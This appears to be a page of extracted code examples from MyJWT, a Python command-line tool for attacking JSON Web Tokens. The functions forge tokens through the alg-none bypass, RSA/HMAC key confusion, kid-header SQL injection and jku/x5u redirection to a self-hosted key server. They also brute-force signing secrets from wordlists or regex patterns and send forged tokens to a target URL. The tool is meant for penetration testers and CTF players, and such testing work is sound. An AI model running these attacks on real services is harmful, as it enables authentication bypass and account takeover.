Beispiel #1
0
def user_none_vulnerability(jwt_json: Dict) -> None:
    """
    Print for none vulnerability.

    Parameters
    ----------
    jwt_json: Dict
        your jwt json (use encode_to_json.Check Doc).
    """
    jwt = none_vulnerability(encode_jwt(jwt_json) + "." + jwt_json[SIGNATURE])
    copy_to_clipboard(jwt)
    click.echo(NEW_JWT + jwt)
Beispiel #2
0
def user_sign_jwt(jwt_json: Dict, key: str) -> None:
    """
     Print For sign method.

    Parameters
    ----------
    jwt_json: Dict
        your jwt json (use encode_to_json.Check Doc).
    key: str
        your key
    """
    if "HS" not in jwt_json[HEADER]["alg"]:
        click.echo(CHECK_DOCS)
    jwt = signature(jwt_json, key)
    copy_to_clipboard(jwt)
    click.echo(NEW_JWT + jwt)
Beispiel #3
0
def user_confusion_rsa_hmac(jwt_json: Dict, hmac: str) -> None:
    """
    Print for rsa/hmac confusion.

    Parameters
    ----------
    jwt_json: Dict
        your jwt json (use encode_to_json.Check Doc).
    hmac: str
        path of your public key.
    """
    jwt = confusion_rsa_hmac(
        encode_jwt(jwt_json) + "." + jwt_json[SIGNATURE],
        hmac,
    )
    copy_to_clipboard(jwt)
    click.echo(NEW_JWT + jwt)
Beispiel #4
0
def user_x5u_by_pass(jwt_json: Dict, url: str) -> None:
    """
    Print for x5u bypass method.

    Parameters
    ----------
    jwt_json: Dict
        your jwt json (use encode_to_json.Check Doc).
    url: str
        your url
    """
    new_jwt = jku_vulnerability(
        jwt=encode_jwt(jwt_json) + "." + jwt_json[SIGNATURE],
        url=url,
    )
    click.echo(NEW_JWT + new_jwt)
    copy_to_clipboard(new_jwt)
    click.echo(
        f"Please run python -m http.server --bind {url} .Before send your jwt",
    )
Beispiel #5
0
def user_bruteforce_wordlist(jwt_json: Dict, wordlist: str) -> None:
    """
    Print For bruteforce method.

    Parameters
    ----------
    jwt_json: Dict
        your jwt json (use encode_to_json.Check Doc).
    wordlist: str
        path of your wordlist
    """
    if "HS" not in jwt_json[HEADER]["alg"]:
        click.echo(CHECK_DOCS)
    key = bruteforce_wordlist(
        encode_jwt(jwt_json) + "." + jwt_json[SIGNATURE],
        wordlist,
    )
    if key == "":
        click.echo(NOT_CRAKED)
    else:
        copy_to_clipboard(key)
        click.echo(CRACKED + key)
Beispiel #6
0
def user_interface(jwt: str) -> None:
    """
    User interface for myjwt.
    Print decoded jwt then list choices of vulnerabilities.

    Parameters
    ----------
    jwt: Your jwt
    """
    click.echo("")
    click.echo("Your jwt is: \n" + jwt)
    click.echo("")
    click.echo("Your jwt decoded is:")
    click.echo("")
    print_decoded(jwt)
    click.echo("")
    jwt_json = jwt_to_json(jwt)
    summary = ""
    while summary != MAIN_SUMMARY_CHOICES_QUIT and summary is not None:
        summary = questionary.select(
            MAIN_SUMMARY_QUESTION,
            choices=MAIN_SUMMARY_CHOICES,
            style=custom_style_fancy,
        ).ask()
        if summary == MAIN_SUMMARY_CHOICES_MODIFY:
            jwt_json = user_modify_jwt(jwt_json)
        elif summary == MAIN_SUMMARY_CHOICES_NONE_ALG:
            user_none_vulnerability(jwt_json)
            summary = MAIN_SUMMARY_CHOICES_QUIT
        elif summary == MAIN_SUMMARY_CHOICES_RSA_CONFUSION:
            hmac = click.prompt(
                MAIN_SUMMARY_PROMPT_PEM,
                type=click.Path(exists=True),
            )
            user_confusion_rsa_hmac(jwt_json, hmac)
            summary = MAIN_SUMMARY_CHOICES_QUIT
        elif summary == MAIN_SUMMARY_CHOICES_BRUTE_FORCE:
            wordlist = click.prompt(
                MAIN_SUMMARY_PROMPT_WORDLIST,
                type=click.Path(exists=True),
            )
            user_bruteforce_wordlist(jwt_json, wordlist)
            summary = MAIN_SUMMARY_CHOICES_QUIT
        elif summary == MAIN_SUMMARY_CHOICES_SIGN:
            key = click.prompt(MAIN_SUMMARY_PROMPT_KEY, type=str)
            user_sign_jwt(jwt_json, key)
            summary = ""
        elif summary == MAIN_SUMMARY_CHOICES_VERIFY:
            key = click.prompt(MAIN_SUMMARY_PROMPT_KEY, type=str)
            user_verify_key(jwt_json, key)
            summary = MAIN_SUMMARY_CHOICES_QUIT
        elif summary == MAIN_SUMMARY_CHOICES_KID:
            injection = click.prompt(MAIN_SUMMARY_PROMPT_INJECTION, type=str)
            new_jwt = user_kid_injection(jwt_json, injection)
            jwt_json = jwt_to_json(new_jwt)
            click.echo(NEW_JWT + new_jwt)
            copy_to_clipboard(new_jwt)
            summary = MAIN_SUMMARY_CHOICES_QUIT
        elif summary == MAIN_SUMMARY_CHOICES_JKU:
            url = click.prompt(MAIN_SUMMARY_PROMPT_JWKS, type=str)
            user_jku_by_pass(jwt_json, url)
            summary = MAIN_SUMMARY_CHOICES_QUIT
        elif summary == MAIN_SUMMARY_CHOICES_X5U:
            url = click.prompt(MAIN_SUMMARY_PROMPT_JWKS, type=str)
            user_x5u_by_pass(jwt_json, url)
            summary = MAIN_SUMMARY_CHOICES_QUIT
Beispiel #7
0
def myjwt_cli(jwt, **kwargs):
    """
    \b
    This cli is for pentesters, CTF players, or dev.
    You can modify your jwt, sign, inject ,etc...
    Full documentation is at http://myjwt.readthedocs.io.
    If you see problems or enhancement send an issue.I will respond as soon as possible.
    Enjoy :)
    All new jwt will be copy to the clipboard.
    \f

    Parameters
    ----------
    jwt: str
        your jwt
    kwargs: Dict
        all option value
    """
    if not is_valid_jwt(jwt):
        sys.exit(NOT_VALID_JWT)

    # detect if some options are here
    # if no option detected print user_interface
    interface_mode = True
    for option in kwargs.values():
        if not (option is None or option == () or not option
                or option == "GET"):
            interface_mode = False
    if interface_mode:
        user_interface(jwt)
        sys.exit()

    if kwargs["bruteforce"]:
        jwt_json = jwt_to_json(jwt)
        if "HS" not in jwt_json[HEADER]["alg"]:
            sys.exit(CHECK_DOCS)
        key = bruteforce_wordlist(jwt, kwargs["bruteforce"])
        if key == "":
            sys.exit(NOT_CRAKED)
        else:
            copy_to_clipboard(key)
            click.echo(CRACKED + key)
            if (not kwargs["add_header"] and not kwargs["add_payload"]
                    and not kwargs["full_payload"]):
                sys.exit()

    if kwargs["add_payload"]:
        payload_dict = dict()
        for payload in kwargs["add_payload"]:
            new_str = payload.split("=")
            if len(new_str) != 2:
                sys.exit(VALID_PAYLOAD)
            payload_dict[new_str[0]] = new_str[1]
        jwt_json = add_payload(jwt_to_json(jwt), payload_dict)
        jwt = encode_jwt(jwt_json) + "." + jwt_json[SIGNATURE]

    if kwargs["add_header"]:
        header_dict = dict()
        for header in kwargs["add_header"]:
            new_str = header.split("=")
            if len(new_str) != 2:
                sys.exit(VALID_HEADER)
            header_dict[new_str[0]] = new_str[1]
        jwt_json = add_header(jwt_to_json(jwt), header_dict)
        jwt = encode_jwt(jwt_json) + "." + jwt_json[SIGNATURE]

    if kwargs["full_payload"]:
        try:
            jwt_json = change_payload(
                jwt_to_json(jwt),
                json.loads(kwargs["full_payload"]),
            )
            jwt = encode_jwt(jwt_json) + "." + jwt_json[SIGNATURE]
        except JSONDecodeError:
            sys.exit(VALID_PAYLOAD_JSON)
    if kwargs["x5u"]:
        jwt = x5u_vulnerability(
            jwt,
            url=kwargs["x5u"],
            pem=kwargs["key"],
            crt=kwargs["crt"],
            file=kwargs["file"],
        )
        copy_to_clipboard(jwt)
        click.echo(NEW_JWT + jwt)
    if kwargs["jku"]:
        jwt = jku_vulnerability(
            jwt,
            kwargs["jku"],
            kwargs["file"],
            kwargs["key"],
        )
        copy_to_clipboard(jwt)
        click.echo(NEW_JWT + jwt)
        click.echo(
            f"Please run python -m http.server --bind {kwargs['jku']} .Before send your jwt",
        )
    if kwargs["kid"]:
        jwt = inject_sql_kid(jwt, kwargs["kid"])
        if not kwargs["sign"]:
            copy_to_clipboard(jwt)
            click.echo(NEW_JWT + jwt)
    if kwargs["hmac"]:
        jwt = confusion_rsa_hmac(jwt, kwargs["hmac"])
        copy_to_clipboard(jwt)
        click.echo(NEW_JWT + jwt)

    if kwargs["none_vulnerability"]:
        jwt_json = change_alg(jwt_to_json(jwt), "none")
        jwt = encode_jwt(jwt_json) + "."
        copy_to_clipboard(jwt)
        click.echo(NEW_JWT + jwt)
    if kwargs["sign"]:
        jwt_json = jwt_to_json(jwt)
        if "HS" not in jwt_json[HEADER]["alg"]:
            sys.exit(CHECK_DOCS)
        jwt = signature(jwt_json, kwargs["sign"])
        copy_to_clipboard(jwt)
        click.echo(NEW_JWT + jwt)
    if kwargs["verify"]:
        jwt_json = jwt_to_json(jwt)
        if "HS" not in jwt_json[HEADER]["alg"]:
            sys.exit(CHECK_DOCS)
        new_jwt = signature(jwt_json, kwargs["verify"])
        click.echo(
            VALID_SIGNATURE if new_jwt.split(".")[2] == jwt.split(".")[2] else
            INVALID_SIGNATURE, )
    if kwargs["crack"]:
        jwt_json = jwt_to_json(jwt)
        if "HS" not in jwt_json[HEADER]["alg"]:
            sys.exit(CHECK_DOCS)

        all_string = list(exrex.generate(kwargs["crack"]))
        click.echo(
            kwargs["crack"] + " have " + str(len(all_string)) +
            " possibilities", )
        with click.progressbar(
                all_string,
                label="Keys",
                length=len(all_string),
        ) as bar:
            for key in bar:
                new_jwt = signature(jwt_json, key)
                if new_jwt.split(".")[2] == jwt.split(".")[2]:
                    copy_to_clipboard(key)
                    sys.exit("Key found: " + key)
            sys.exit(INVALID_SIGNATURE)
    if kwargs["url"]:
        data_dict = dict()
        for d in kwargs["data"]:
            new_str = d.split("=")
            if len(new_str) != 2:
                sys.exit(VALID_DATA)
            if new_str[1] == "MY_JWT":
                data_dict[new_str[0]] = jwt
            else:
                data_dict[new_str[0]] = new_str[1]

        cookies_dict = dict()
        for cookie in kwargs["cookies"]:
            new_str = cookie.split("=")
            if len(new_str) != 2:
                sys.exit(VALID_COOKIES)
            if new_str[1] == "MY_JWT":
                cookies_dict[new_str[0]] = jwt
            else:
                cookies_dict[new_str[0]] = new_str[1]
        try:
            response = send_jwt_to_url(
                kwargs["url"],
                kwargs["method"],
                data_dict,
                cookies_dict,
                jwt,
            )
            click.echo(response.text)
        except requests.exceptions.ConnectionError:
            sys.exit("Connection Error. Verify your url.")
    if kwargs["print"]:
        copy_to_clipboard(jwt)
        print_decoded(jwt)

    if (not kwargs["none_vulnerability"] and not kwargs["hmac"]
            and not kwargs["bruteforce"] and not kwargs["sign"]
            and not kwargs["verify"] and not kwargs["jku"]
            and not kwargs["x5u"] and not kwargs["print"]):
        copy_to_clipboard(jwt)
        click.echo(NEW_JWT + jwt)
    sys.exit()